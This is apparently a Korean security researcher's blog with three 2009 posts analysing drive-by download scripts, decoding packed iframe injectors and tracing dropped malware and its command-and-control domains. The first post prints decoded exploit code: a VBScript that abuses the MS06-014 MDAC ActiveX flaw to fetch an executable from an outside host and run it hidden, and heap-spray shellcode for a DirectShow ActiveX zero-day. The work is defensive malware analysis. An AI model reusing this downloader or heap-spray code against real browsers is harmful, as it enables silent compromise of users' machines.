0x02 analysis2009.10.01 18:03

지금쯤 고향앞으로!! 하시는 분들도 계실겁니다.
무사히 다녀오시길 바랍니다. ^^
전 먼저 갔다와서 내일,모레까지 근무네요...ㅜ.ㅜ

오랜만에 스크립트 하나 분석했습니다.

확보한 파일은 총 8개입니다.

swf.js --- Main.asp ---+--- ad.htm ---> hxxp://www.eleparts.co.kr/data/msn.exe
                       +--- index.htm ---+--- he1.swf
                                         +--- he3.swf
                                         +--- he2.swf

swf.js

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7.8("<1 5=4://2.3.6.9/d./e.c b=0 a=0></1>");',15,15,'|iframe|xxx|yyy|http|src||document|write|zzz|height|width|asp|t|Main'.split('|'),0,{}))

첫번째 스크립트는 패킹되어 있었습니다. http://dean.edward.name/unpacker 에서 언패킹해보면 iframe으로 Main.asp를 삽입하고 있었습니다.

document.write("<iframe src=http://xxx.yyy.6.zzz/t./Main.asp width=0 height=0></iframe>");


Main.asp

<SCRIPT>
document.write("<iframe width=50 height=0 src=ad.htm></iframe>");
document.write("<iframe width=100 height=0 src=index.htm></iframe>");
window.status="供냥";
window.onerror=function(){return true;}
</SCRIPT>
</HEAD>
</HTML>


ad.htm

<script type="text/jscript">
function init() {
document.write("");
}
window.onload = init;
</script>
<script>
var a1 = "ABCDEFG";
var a2 = "HIJKLMNOP";
var a3 = "QRSTUVWXYZabcdef";
var keyStrs = a1+a2+a3+"ghijklmnopqrstuv"+"wxyz0123456789+/"+"=";
function mydata(input){
 var output="";
 var chr1,chr2,chr3="";
 var enc1,enc2,enc3,enc4="";
 var i=0;
 var base64test=/[^A-Za-z0-9\+\/\=]/g;
 input=input.replace(/[^A-Za-z0-9\+\/\=]/g,"");
 do{
  enc1=keyStrs.indexOf(input.charAt(i++));
  enc2=keyStrs.indexOf(input.charAt(i++));
  enc3=keyStrs.indexOf(input.charAt(i++));
  enc4=keyStrs.indexOf(input.charAt(i++));
  chr1=(enc1<<2)|(enc2>>4);
  chr2=((enc2&15)<<4)|(enc3>>2);
  chr3=((enc3&3)<<6)|enc4;
  output=output+String.fromCharCode(chr1);
  if(enc3!=64){output=output+String.fromCharCode(chr2);};
  if(enc4!=64){output=output+String.fromCharCode(chr3);};
  chr1=chr2=chr3="";
  enc1=enc2=enc3=enc4="";
 };
 while(i<input.length);return output;
 };
t="43 + 37 ,107 - 36 ,9880 / 95 ,64 - 16 ,117 - 19 ,141 - 54 ,8211 / 69 ,9 + 34 ,884 / 13 ,97 - 16 ,153 - 42 ,38 + 18 ,75 + 24 ,350 / 7 ,5772 / 74 ,2057 / 17 ,0 + 97 ,70 + 18 ,3498 / 53 ,3 + 45 ,3358 / 46 ,16 + 55 ,137 - 17 ,90 + 14 ,174 - 76 ,153 - 44 ,167 - 67 ,1715 / 35 ,3204 / 36 ,4437 / 51 ,42 + 58 ,8856 / 82 ,51 + 29 ,3320 / 40 ,109 - 35 ,75 + 12 ,157 - 76 ,3348 / 31 ,113 - 35 ,64 + 42 ,172 - 73 ,4360 / 40 ,54 + 54 ,156 - 37 ,9200 / 92 ,1139 / 17 ,29 + 44 ,46 - 3 ,4420 / 65 ,72 + 9 ,6 + 106 ,179 - 61 ,1372 / 14 ,10395 / 99 ,52 + 14 ,196 - 88 ,... 중략 ...,13 + 90 ,51 + 39 ,10 + 99 ,102 - 49 ,187 - 83 ,1666 / 17 ,9 + 78 ,4760 / 56 ,30 + 90 ,94 - 18 ,670 / 10 ,102 - 29 ,4200 / 40 ,44 + 32 ,1675 / 25 ,56 + 17 ,111 - 6 ,30 + 46 ,4154 / 62 ,58 + 16 ,4720 / 40 ,94 + 5 ,83 - 12 ,4420 / 52 ,10185 / 97 ,3922 / 53 ,210 - 105 ,146 - 72 ,35 + 82 ,67 + 6 ,205 - 100 ,156 - 37 ,13447 / 113 ,4420 / 65 ,2754 / 34 ,174 - 63 ,1680 / 30 ,1 + 75 ,816 / 16 ,31 + 47 ,152 - 46 ,127 - 28 ,65 + 44 ,195 - 87 ,195 - 76 ,1700 / 17 ,55 + 13 ,22 + 30 ,84 - 23 ";
t=eval("mydata(String.fromCharCode("+t+"))");
document.write(t);
</script>

ad.htm은 t에 저장되는 문자열이 핵심입니다.
위 스크립트를 디코딩해보면

<html>
<script language="VBScript">
on error resume next
dl = "http://www.xxxxxxxx.co.kr/data/msn.exe"
Set df = document.createElement("ob"&"ject")
df.setAttribute "classid", "clsid:BD96C55"&"6-65A3-11D0-983A-00C04FC29E36"
str="Microsoft"&".XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"&"ea"
str1=a1&a2&a3
str5=str1
set S = df.createobject(str5&"m","")
S.type = 1
str6="G"&"ET"
x.Open str6, dl, False
x.Send
fname1="g0ld"&".com"
set F = df.createobject("Scripti"&"ng.FilesystemObject","")
set tmp = F.GetSpecialFolder(2)
S.open
fname1= F.BuildPath(tmp,fname1)
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Ap"&"plication","")
Q.ShellExecute fname1,"","","ope"&"n",0
</script>

이 스크립트는 MS06-014 취약점을 공격해서 hxxp://www.xxxxxxxx.co.kr/data/msn.exe 파일을 다운로드하여 실행하게끔 합니다. 미리 받아놨어야 하는데 안받아놨었습니다. -_-;; 지금은 다운로드가 안되는군요...


index.htm

<html>
<body> 
<div id="DivID">
<script src='he1.swf'></script> 
<script src='he3.swf'>
</script>
<script src='he2.swf'></script> 
</body>
</html>



he1.swf, he3.swf, he2.swf

var XXXxxyt='0';
var xxyytt='%';
var xxttyy='u';
var ttyyxx=xxyytt+xxttyy;
var UUse=ttyyxx+'9'+'09'+'0'+ttyyxx+'9'+'0'+'9'+XXXxxyt;
var YTavp='%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uEAEA';
var YTavp1='%u5858%u5858%u10EB%u4B5B%uC933%uB966%u03B8%u3480%uBD0B%uFAE2%u05EB%uEBE8%uFFFF';
var ytshell=unescape(UUse+YTavp1+... 중략 ...+'%u4627%uA8EE%ud5db%uc9c9%u87cd%u9292%ud2c9%ucfc8%ud493%udccb%uded3%uc9d4%u93c4%ud2de%u92d0%ud0d4%udadc%uced8%ud492%udccb%u92d3%ud2d1%ud2da%ud893%ud8c5%uBDBD%uBDBD'+YTavp);
var headersize=20;
var omybro=unescape(UUse);

var coass="darf";

var slacksace=headersize+ytshell.length;

while(omybro.length<slacksace)
omybro+=omybro;
bZmybr=omybro.substring(0,slacksace);
shuishiMVP=omybro.substring(0,omybro.length-slacksace);
while(shuishiMVP.length+slacksace<0x30000)
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
var r=0;
var rsc="f";
for(x=r;x<300;x++)
memory[x]=shuishiMVP+ytshell;

var vpnject=document.createElement('ob'+'j'+'e'+'c'+'t');
DivID.appendChild(vpnject);
vpnject.width='1';
vpnject.height='1';
vpnject.data='./logo.gif';
var caoavp='li';
vpnject.classid='clsid:0955AC62-BF2E-4CBA-A'+'2B9-A63F772D46CF';


he1.swf, hw2.sef, hw3.swf는 플래쉬 파일이긴 하지만 실제로는 자바스크립트가 들어 있었습니다.
이 스크립트는 DirectShow MPEG2TuneRequest 취약점을 공격하는 제로데이 스크립트입니다.

자세한 내용은 http://hummingbird.tistory.com/1184 를 참조하시기 바랍니다.




참고로 ad.htm과 같은 형태의 스크립트가 실제로는 어떤 스크립트인지 확인하기 위해서는 디코딩 작업을 수행해야 합니다.
이런 경우 디코딩하는 간단한 팁(?)을 적어볼까 합니다.

ad.htm 스크립트 내용을 그대로 적고 마지막에 document.write(t); 와 </script> 는 지웁니다.
그리고 아래 내용을 이어서 적습니다.

document.write("<textarea rows=30 cols=100>");
document.write(t);
document.write("</textarea>");
</script>

이렇게 html 파일을 웹서버에 만들고 해당 파일을 요청하면 인코딩된 내용들이 디코딩되고 원래대로는 document.write(t)에서 실행하게 되는데 위 html 파일을 보면 <textarea>라는 태그때문에 스크립트가 실행되지 않고 텍스트 상자안에 디코딩된 스크립트 내용이 그대로 출력되게 됩니다.


이 방법은 일반적으로 많이 볼 수 있는 인코딩된 스크립트를 디코딩하는데에도 사용 가능합니다.
<textarea> 태그의 특성을 이용해서 스크립트를 그대로 출력하게 하는 방법으로 일반적으로 많이 보이는 인코딩된 스크립트는 document.write(unescape("인코딩된 문자열")); 과 같은 방법으로 확인 가능합니다.

즉, 아래와 같이 쓰시면 됩니다.

document.write("<textarea rows=30 cols=100>");
document.write(unescape("인코딩된 문자열"));
document.write("</textarea>");
</script>


이 방법을 알려주신 방립동님께 거듭 감사드립니다. ^^



그럼 오늘도 즐삽~





저작자 표시 비영리 변경 금지
신고
크리에이티브 커먼즈 라이선스
Creative Commons License
Posted by demantos

댓글을 달아 주세요

  1. 자바스크립트 난독화 관련해서 김지훈 선임연구원이 작성한 문서도 좋더군요.

    http://image.ahnlab.com/file_upload/tech/javascript.pdf

    2009.10.05 15:58 신고 [ ADDR : EDIT/ DEL : REPLY ]

0x02 analysis2009.09.01 16:03


오랜만에 악성스크립트를 몇개 만났습니다.




25일 오전 10시쯤에에 메일을 받은 녀석인데요..
LastWriteTime이 24일 저녁 10시와 25일 오전 8시쯤이군요..

전부 인코딩되어 있거나 패킹 또는 자체적인 함수를 사용해서 알아보기 힘들게 해놨습니다. -_-;;
10개의 파일 중 모체가 되는 녀석이 6.htm인데요 요녀석부터 살펴보도록 하겠습니다.


6.htm




디코딩해보면 다음과 같습니다.




전형적인 악성스크립트입니다. width와 height가 0입니다.
요즘은 width와 height는 정상적인 사이즈로 주고 visibility를 hidden으로 해서 보이지 않게 하는 경우도 있더군요..

위에 보시는것처럼 6.htm 페이지가 클라이언트에 의해 요청되면 다른 페이지들(htm, gif, js)도 연달아 요청이 됩니다.
확인결과 gif도 악성스크립트였습니다.


06014.htm




요놈은 좀 기네요...공격을 위한 스크립트가 들어있을거라 예상해봅니다.
디코딩해봤습니다.




보시는것처럼 clsid:BD96C556-65A3-11D0-983A-00C04FC29E36가 있습니다.
파일명에서 보시는것처럼 MS06-014 MS Internet Explorer(MDAC) Remote Code Excution Exploit 취약점을 공격하기 위한 스크립트입니다.


811.gif




파일명만 gif고 실체는 VBScript 입니다.
위 그림에서는 안보이지만 마지막 라인에 Execute DC(Q)라는 라인에서 문자열을 함수에 넣어서 실제 스크립트를 만들어내고 실행하고 있습니다.
실제 스크립트는 다음과 같습니다.



자바스크립트입니다.
위 악성스크립트는 milw0rm에 있는거랑 똑같네요..


Microsoft Works 7의 wkimgsrv.dll 파일에서 발생하는 취약점을 공격하는 코드입니다.
공격이 성공하면 쉘코드를 실행하게 됩니다. EvilCuteCode로 되어 있는 부분이 쉘코드입니다.


853.js



이번에도 VBScript로 되어있군요..
역시나 쉽게 알아보지 못하게 꼬아놨습니다. -_-;;
못 풀것도 없습니다. 



이제서야 본색을 드러내고 있군요... hxxp://www.cuteqq.cn/asp/calc.exe
전혀 귀엽지 않은 녀석이 cute라는 단어를 쓰고 있으니 좀 거북하군요...-_-;;

위 실행 파일을 AIG.scr로 저장하고 실행하는 것으로 보입니다.
그림에서는 짤렸지만 제일 마지막에 나오는 스크립트를 보면 Loading.......이라고 출력만 합니다.
즉, 사용자가 보기에는 로딩되고 있는가?? 라고 생각하게끔 만들고 취약점을 공격해서 실행파일을 AIG.scr로 저장하는 것이죠..
앞서 보셨던것과 동일하게 MS06-014 취약점을 공격해서 calc.exe 파일을 실행하고 있습니다.


f9.htm




이번 파일은 SWFObject가 있는 것으로 보아 플래쉬 플레이어 취약점을 공격하는 공격코드인 듯 합니다.
물론 아닐 수도 있습니다. ^^;;
일단 인코딩되어 있으니 디코딩해서 코드를 살펴봐야겠습니다.




 

f10.htm







디코딩을 두번이아 했습니다. 그런데도 아직 인코딩된 문자열들이 남아 있네요..
유니코드로 인코딩되어 있는 부분은 shellocde입니다.
위 공격스크립트는 Ourgame 'GLIEDown2.dll' ActiveX Control Remote Code Execution 취약점을 공격하는 스크립트입니다.
첫번째 줄에 나온 clsid를 보면 알 수 있습니다.


여기에 있는 스크립트와 비슷한 스트립트네요..


mpg.htm





이번엔 디코딩했던니 패킹되어 있는 녀석이군요..(참 골고루 하고 있습니다)
패킹되어 있는 녀석을 언패킹해서 코드를 볼려고 했는데 계속 illegal character라고 나오더군요..
아마도 코드를 복사하는 과정에서 오타(?)가 나서 몇 글자 빼먹었거나 추가되었을 가능성이 커 보입니다.
일단은 직접 코드를 실행해보고 결과를 확인해보도록 하겠습니다.


092.htm






092.htm 파일은 811.gif와 동일한 파일이었습니다.
다른거라고는 일부 변수명만 다를뿐 쉘코드도 동일한 쉘코드를 사용하고 있었습니다.
아마도 여기저기서 악성스크립트 모아다가 페이지를 만든거 같은데 중복된걸 깜박했나 봅니다. -_-

914.htm






이번 스크립트는 Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit 이었습니다.

http://www.milw0rm.com/exploits/5332

aces.gif




이번에도 패킹된 녀석인데 위에서 보셨던 mpg.htm과 동일하게 illegal character라고 나옵니다.
이것도 직접 실행해서 어떤 증상이 나타나는지 확인해봐야겠습니다.

 
언패킹되지 않았던 mpg.htm과 aces.gif는 모두 스크립트가 정상적으로 동작하지 않았습니다.
즉, 패킹된 데이터가 정상이 아니라는 이야기겠지요..

결국 www.cuteqq.cn/asp 에서 calc.exe를 다운 받아 실행하는 것으로 보이는데 직접 접근해 봤지만 다운로드가 안되고 있었습니다.
이게 보통 PoC 코드를 그대로 써서 PoC 코드에서 주로 시연하는 실제 계산기인지 아니면 이름만 calc.exe이고
실제 악성코드인지는 확인이 되지 않고 있습니다.



이번에도 반쪽짜리 분석이 되고 말았네요..-_-;;

오랜만에 쓴 글인데 아쉽습니다..








저작자 표시 비영리 변경 금지
신고
크리에이티브 커먼즈 라이선스
Creative Commons License
Posted by demantos

댓글을 달아 주세요

0x02 analysis2009.03.04 21:48

엊그제 네x버의 SecurityPlus 까페에 갔다가 획득하게 된 파일들입니다.
다운 받은 파일은 html과 js 파일이었는데 결국 하나의 파일을 통해 iframe이나 script로 연결된 파일들이었습니다.

가장 먼저 나오는놈부터 보겠습니다.

help.htm
<script src=http://125.xxx.xxx.xxx/ad/bir.js></script>
<script src="http://s17.cnzz.com/stat.php?id=1255205&web_id=1255205" language="JavaScript" charset="gb2312"></script>

bir.js 파일이 script 태그를 통해 삽입되고 있습니다. 바로 아래에는 익숙한 도메인이 보이는군요.. 현재 두번째 스크립트는 스크립트로써 동작하지 않고 그냥 텍스트 형태로 문자열만 보이고 있습니다.

그럼 bir.js 파일을 보도록 하겠습니다.



그냥 딱 보기에도 악성스크립트인게 보입니다. 정상적인 스크립트라면 이런식으로 인코딩하지 않겠죠..
뭔가 구린게 있으니 인코딩을 하는거겠죠?

인코딩된 내용을 디코딩해보니 브라우져가 MSIE 7버전이 아닌 경우에 MS06-014 취약점을 찾고 취약점이 있을 경우 tmg.htm 파일을 iframe으로 삽입합니다.
그리고 RealPlayer의 취약점을 찾고 RealPlayer의 버전이 6.0.14.802일 경우 so.htm을 6.0.14.552일 경우 sso.htm을 iframe으로 삽입합니다.
마지막으로 ie.htm을 iframe으로 삽입합니다.

결국 이 파일은 MS06-014 취약점과 RealPlayer 6.0.14.802와 6.0.14.552 버전의 취약점을 공격하는 스크립트입니다.


이번엔 is.htm 파일입니다.




첫번째 빨간 네모 안의 인코딩된 데이터는 쉘코드인 듯 합니다.
is.htm 파일의 처음부터 빨간 네모 있는 부분까지는 MS09-002 취약점을 공격하는 코드가 아닌가 생각됩니다.(방립동님 감사~)
방립동님께서 조언해주시면서 알려주신 사이트입니다. 참고하시면 도움이 되실듯...
http://www.hacker.com.cn/article/view_15004.html
http://blog.sina.com.cn/s/blog_4cbae5c50100c46d.html

혹시 이부분이 틀렸다면 지적해주세요~

그리고 두번째 빨간 네모 안의 인코딩된 데이터는 XML 파싱 취약점을 공격하는 코드입니다. 두번을 디코딩하면 다음과 같은 코드가 나옵니다.




이번에는 tmg.htm 파일입니다.



원래는 이것보다 더 길게 나오는데 짤렸습니다. tmg.htm은 packer로 패킹을 했기 때문에 언팩을 해야 합니다. 리버싱에서의 언팩이 아닙니다...-_-;;
http://dean.edwards.name/packer 에 가시면 패킹도 가능하고 언팩도 가능합니다.

언팩을 해보면




이번에도 디코딩해야 할게 두개가 있습니다. 하나는 실제 실행될 악성코드를 다운 받을 URL이구요 하나는 CLSID입니다. CLSID로 구글신께 질뭉을 드리면 MS06-014 취약점이라고 대답해주십니다.(구글신 만쉐~)

일단 URL의 파일을 받아 봤습니다. 그리고 실행해봤습니다.(꼭 vmware에서 하시기 바랍니다)

먼저 동일한 사이트(http://www.pinganye.net)에서 뭔가를 열심히 받아옵니다.



일단 다운 받을 파일의 목록(/css/img/List.txt)을 가져온 다음 파일을 받아옵니다. (maz.exe, daz.exe, haz.exe, paz.exe, oaz.exe)

Winalysis로 시스템 스냅샷을 뜬 후 img.exe를 실행하기 전과 비교해보니 상당히 많은 변화가 생겼습니다.
파일이 총 8개가 새롭게 생성되었고 레지스트리는 말할 것도 없습니다. 그리고 새로운 서비스도 생겼습니다.






아무래도 새로 생성된 8개의 파일은 다운 받았던 6개의 파일에 의해 생성된 듯 합니다. 그리고 서비스를 직접 확인해 봤습니다.






공격자들이 자주 애용하는 svchost -krnlsrvc가 보이구요
Windows Hardware Card는 설명이 너무 눈에 띄게 특이 하군요...-_-;;

우리의 영원한 동반자이자 친구인 Process Explorer에게 물어봤습니다... 쟤네들 도대체 지금 무슨 짓을 하고 있는지...




한놈은 계속 연결되어 있는데 한놈은 연결됐다가 끊기고를 반복하고 있었습니다.




http://sharetitt.3322.org:9012/20090030004/21000904/5366250.jsp 를 계속 요청하지만 sharetitt.3322.org는 없다고 합니다. 계속 RST 패킷만....


[추가증상]
저는 분석 시스템에서 보통 시스템폴더, 보호된 운영체제파일, 숨김파일등이 보이게끔 설정을 하곤 합니다. (개인노트북도 그렇지만...)
그런데 img.exe 이녀석...계속 숨김파일 및 폴더는 표시안함으로 설정을 되돌리는군요..
이러다간 다른 악성코드들까지 잘못하면 안보이겠네요..


Wireshark로 뜬 패킷 중에 DNS 질의하는 놈들만 골라봤습니다. 총 4개의 도메인을 질의하는데 그 중 한놈은 없다고 하네요...



www.honggu2009.com은 질의만 할 뿐 다른 행동은 하지 않았고 srily.vicp.net은 sharetitt.3322.org와 아이피가 같았습니다.
3322.org야 막혀 있으니 상관 없는데요 srily.vicp.net은 아직 sink hole 처리가 되어 있지 않군요.. 도메인 차단해야 할 듯 합니다.


img.exe 실행하면서 캡쳐했던 패킷은 첨부하겠습니다.


html 코드만 볼려다가 갑자기 이야기가 삼천포로 빠졌군요...-_-;;


다음은 so.htm과 sso.htm 파일입니다. 실제 파일 내용은 더 길지만 지면 관계상 짧게 잘랐습니다.






둘 다 RealNetworks RealPlayer ActiveX controls 취약점을 공격하는 코드입니다.
sso.htm 내용중 빨간색으로 표시된 부분 보이시죠? 유치한 방법을 사용했습니다.

"IEaaR"+"PCaaatl.I"+"EaaaRP"+"Ctaaal.1" 라고 쓴 후 바로 아래에서 a 라는 글자를 없애버립니다. 그런 IERPCtl.IERPCtl.1이라고 변환이 됩니다.
별게 아니라 생각되지만 점점 복잡하게 꽈놓는게 공격자들의 성향인 듯 합니다. 앞으로가 걱정...


마지막으로 ie.htm은 FlashPlayer 버전을 확인한 후 Antivir 백신의 설치와 업데이트를 방해합니다.(SecurityPlus musicalmman님)




마지막에 파란색으로 된 부분은 패킹되어 있는 부분입니다. 패킹을 풀면 플래시플레이어의 버전에 따른 행동들을 지정하고 있습니다.







윈도우 업데이트와 주요 어플리케이션들에 대한 패치가 이루어지지 않으면 공격을 받을 수 있습니다.
다른 말로 하자면 좀비가 될 수 있다는 것이지요..

흔히 PC방에서는 바이러스 걸렸다 싶으면 백업해놓은 걸로 한번 밀면 그만이라 합니다.
하지만 백업해놓은 걸로 다시 설치하면 재감염됩니다.

안일하고 잘못된 생각들이 좀비의 수를 늘리고 있습니다.
물론 ISP들은 그걸 막기 위해 삽질해서 숙주도메인 찾아서 막고 있습니다.

sharetitt.3322.org 막혔습니다. 이 놈 몇 주 전에 유심히 지켜봤던 기억이 나네요.
헌데 sharetitt.3322.org와 같은 아이피로 srily.vicp.net 도메인이 등록되어 있습니다.
그럼 ISP는 또 막겠죠? 그럼 공격자들은 또 다른 도메인을 찾을겁니다.

3322.org가 잘 안되니 optus.nu로 갈아타자~ 라는 지하세계의 공지가 있었다고 하니 3322.org를 막는다고 전부 해결되는게 아닙니다.
지금 optus.nu에 대한 질의가 점점 늘어나고 있습니다. 몇 달 뒤엔 optus.nu를 차단하는 일이 발생할 수도 있겠죠..



이상으로 정리가 잘 되지 않은 분석을 보시느라 수고하셨습니다. ^^;;

잘못된 부분이 있다면 지적해주시면 감사하겠습니다.

그리고 분석했던 htm 파일은 필요하신분들께 드리도록 하겠습니다.





저작자 표시 비영리 변경 금지
신고
크리에이티브 커먼즈 라이선스
Creative Commons License
Posted by demantos

댓글을 달아 주세요

  1. 자세하게 분석하셨네요^^b

    2009.03.05 09:30 신고 [ ADDR : EDIT/ DEL : REPLY ]
    • 네 감사합니다. ^^
      viruslab님의 블로그에서도 좋은 정보 많이 얻고 있습니다~

      2009.03.05 10:00 신고 [ ADDR : EDIT/ DEL ]
  2. kkimjhd

    카페에 제가 올려뒀던 파일이네요^^ 후후.. 분석하기 힘들어서 포기하고 있었는데.. 포스팅하신거 보고 보고서 작성할 수 있게 됐네요^^ 감사하다는 말씀 남기옵니다^^

    2009.03.05 13:52 신고 [ ADDR : EDIT/ DEL : REPLY ]
    • 도움이 되셨다면 저야 기쁘죠~
      출처만 정확히 밝혀주신다면...^^;

      2009.03.05 15:34 신고 [ ADDR : EDIT/ DEL ]
  3. 보기 편하게 분석 정리를 잘 하셨네요...

    좋은 내용 스크랩 좀 하겠습니다...

    감사합니다^^

    2009.03.05 14:57 신고 [ ADDR : EDIT/ DEL : REPLY ]
    • 흰바탕이 역시나 보기가 더 좋군요..
      근데 전 검정바탕을 좋아하는지라...;;

      2009.03.05 15:35 신고 [ ADDR : EDIT/ DEL ]
  4. 슈멘달려

    글 잘읽었습니다.
    혹시 Winalysis좀 받을수 있을까요? 가능하시면 shumen@hanafos.com 으로 좀 보내주시면 감사합니다 +_+

    2009.03.05 16:07 신고 [ ADDR : EDIT/ DEL : REPLY ]
    • google에서 검색하시면 됩니다.

      2009.03.05 16:20 신고 [ ADDR : EDIT/ DEL ]
    • 슈멘달려

      구글 검색을 해서 찾가가면 이상하게 해당 사이트에서 제공을 안해주는지 받을수 없어서용;

      2009.03.05 16:34 신고 [ ADDR : EDIT/ DEL ]
    • 다 안찾아보셨군요..
      간절히 원하신다면 찾으실 수 있으셨을텐데요..

      http://www.softsea.com/download/Winalysis.html

      여기서 다운로드 됩니다.
      구글신은 우리를 버리지 않으십니다...ㅎㅎ

      2009.03.05 17:27 신고 [ ADDR : EDIT/ DEL ]
    • 슈멘달려

      정말 감사합니다 ㅠ_ㅠ;; 흐미..
      인코딩 정말 많이도 해놧군요;;; 집에가서 이거 보고 VM등록해서 따라 해봐야 겟습니다 ^^

      2009.03.05 17:33 신고 [ ADDR : EDIT/ DEL ]
  5. 많은 시간 투자한게 보입니다.
    부럽군요.ㅎ

    2009.03.05 20:46 신고 [ ADDR : EDIT/ DEL : REPLY ]
  6. 와꾸최고

    죄송한데 아직 파일 있으면 코드 파일 좀 보내주실수 있나요? ^^;
    공부 하는데 쓰고 싶습니다.ㅎ
    가지고 계시다면 backstreet27@naver.com 으로 보내주시면 감사하겠습니다~ㅋ

    2009.07.14 20:42 신고 [ ADDR : EDIT/ DEL : REPLY ]


티스토리 툴바